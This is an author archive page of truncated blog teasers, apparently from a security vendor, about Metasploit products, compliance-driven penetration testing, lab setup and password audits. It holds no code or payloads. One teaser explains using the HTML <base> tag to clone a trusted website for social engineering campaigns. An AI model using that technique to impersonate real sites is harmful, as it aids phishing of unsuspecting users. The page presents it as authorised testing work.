Posts by Christian Kirsch

1 min Metasploit

Creating a FISMA report in Metasploit Pro

If you're working in IT security in U.S. federal government, chances are that you have to comply with the Federal Information Security Management Act of 2002 (FISMA). With Metasploit Pro, you can generate FISMA compliance reports that map penetration testing findings to controls, as recommended by Special Publication 800-53a (Appendix G) published by the National Institute of Standards and Technology (NIST) and by Consensus Audit Guidelines issued by a number of constituents including NIST and f

1 min Metasploit

Pentest Web Servers You Didn't Know You Had

Most tools for web application security testing have the approach of going deep into an application to uncover issues inside a single web application. There's nothing wrong with this approach if you want to do a deep dive into one specific web application, especially if it is a major application exposed on the Web. The other approach is to see what web servers are running on a network and seeing if they can be exploited with quick and scalable testing. This is the approach Metasploit Pro takes.

3 min Metasploit

How to leverage the command line in Metasploit Pro

"I'm more comfortable with the Metasploit command line," is an objection I often hear from long-time Metasploit Framework users who are thinking about purchasing a copy of Metasploit Pro or Metasploit Express. What many penetration testers don't know is that you can use the command line in the commercial Metasploit editions, and leverage their advantages at the same time. Reporting: The commercial Metasploit editions include one-click reporting that includes any work you have completed on the

1 min Metasploit

Jumping to another network with VPN pivoting

VPN Pivoting is one of the best but also most elusive features in Metasploit Pro, so the best way is to see it. That's why I've decided to post a snippet of a recent webinar, where HD Moore shows this feature in action. VPN pivoting enables users to route any network traffic through an exploited host with two NICs to a different network. For example, you could run nmap, Metasploit network discovery, or Nexpose vulnerability scans through the VPN pivot. Using a TUN/TAP adaptor on the Metasploit

1 min Penetration Testing

On-demand Webcast: How to Set Up a Penetration Testing Lab

The recording of the webinar "How to set up a penetration testing test lab" is now online [http://www.rapid7.com/resources/webcast-pentest-lab.jsp]. Big thanks to Matt for a great presentation, and huge thanks too all of the participants for the great questions and input, which I've included in the Q&A transcription. Webinar resources: * Webinar recording [http://www.rapid7.com/resources/webcast-pentest-lab.jsp] * Webinar slides [https://community.rapid7.com/docs/DOC-1625] Related blog po

1 min Penetration Testing

10 Places to Find Vulnerable Machines for Your Lab

It can sometimes be challenging to find vulnerable machines for your penetration testing or vulnerability management lab. Here's a list of vulnerable machines you should check out: 1. Metasploitable [http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web] 2. UltimateLAMP [http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip] 3. Web Security Dojo [http://sourceforge.net/projects/websecuritydojo/files/] 4. OWASP Hackademics [https://code.google.com/p/owasp-ha

1 min Penetration Testing

Using the <base> tag to clone a web page for social engineering attacks

Social engineering campaigns can be a lot more effective if you can impersonate a well-known website that users trust. However, when you simply clone a website by cutting-and-pasting the page source and putting it on your own server, your links will stop working. Copying all links and images from the other site can be cumbersome, but there's an alternative: the HTML <base> tag. It specifies a default address/target for all links on a page; it is inserted into the head element. Let's say you've

1 min Skills

Metasploit Tutorial: An introduction to Metasploit Community

Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product. If you don't have them already, download the free Metasploit Comm

3 min Metasploit

Installing Metasploit Community Edition on BackTrack 5 R1

Update: I just published a new blog post for using Metasploit on BackTrack 5 R2 [/2012/05/30/install-metasploit-on-backtrack]. BackTrack 5 R1 comes pre-installed with Metasploit Framework 4.0. Unfortunately, Metasploit Community, which brings a great new Web UI and other functionality, was introduced in version 4.1, so it's not included by default. Updating Metasploit Framework using the msfupdate command will not install the Web UI. In addition, BT5 only makes the development trunk available,

1 min Metasploit

Adding custom wordlists in Metasploit for brute force password audits

In any penetration test that involves brute forcing passwords, you may want to increase your chances of a successful password audit by adding custom wordlists specific to the organization that hired you. Some examples: * If you are security testing a hospital, you may want to add a dictionary with medical terms. * If you're testing a German organization, users are likely to use German passwords, so you should add a German wordlist. * Another good idea is to build a custom wordlist b

2 min Metasploit

Three Great New Metasploit Books

I've seen three great Metasploit books published lately. The one that most people are probably already familiar with is Metasploit: The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns and Mati Aharoni. The book is very comprehensive, and packed full of great advice. David Kennedy is Chief Information Security Officer at Diebold Incorporated and creator of the Social-Engineer Toolkit (SET), Fast-Track, and other open source tools, so he really knows his stuff. By the way,

1 min Metasploit

Joshua Corman discovers HD Moore's Law

At Metricon6 and later on his blog Cognitive Dissidents [http://cognitivedissidents.wordpress.com/2011/11/01/intro-to-hdmoores-law/], Joshua Corman presented his latest discovery - HD Moore's Law: "Casual Attacker power grows at the rate of Metasploit" Which is basically a different way of saying that Metasploit is the minimum bar you need to test for if you want to keep your network secure. HD Moore created the Metasploit Project in 2003 to provide the security community with a public resou

1 min Penetration Testing

Getting Management Buy-In for Penetration Testing

I often hear from technical IT folks that communicating the benefit of a penetration test is difficult, especially to a business audience. "You want me to authorize you to break into my systems?" they ask. We are all afraid of things we don't understand. This is why you should first make your management comfortable with the concept of penetration testing. Why don't you try this example: We should all visit our doctor for regular medical check-ups, even when we feel healthy. This is the only way

2 min Metasploit

PCI DIY: How to do an internal penetration test to satisfy PCI DSS requirement 11.3

If you're accepting or processing credit cards and are therefore subject to PCI DSS, you'll likely be familiar with requirement 11.3, which demands that you "perform penetration testing at least once a year, and after any significant infrastructure or application upgrade or modification". What most companies don't know is that you don't have to hire an external penetration testing consultant - you can carry out the penetration test internally, providing you follow some simple rules: * Sufficie

1 min Metasploit

How to update to Metasploit 4.0

If you're packing to go to Black Hat, Defcon or Security B-Sides in Las Vegas, make sure you also download Metasploit 4.0 to entertain you on the plane ride. If you missed the recent announcement, check out this blog post [/2011/07/26/metasploit-pro-40-brings-greater-enterprise-integration-cloud-deployment-options-and-penetration-testing-automation] for a list of new features. The new version is now available for all editions, and here's how you upgrade: * Metasploit Pro and Metasploit Expre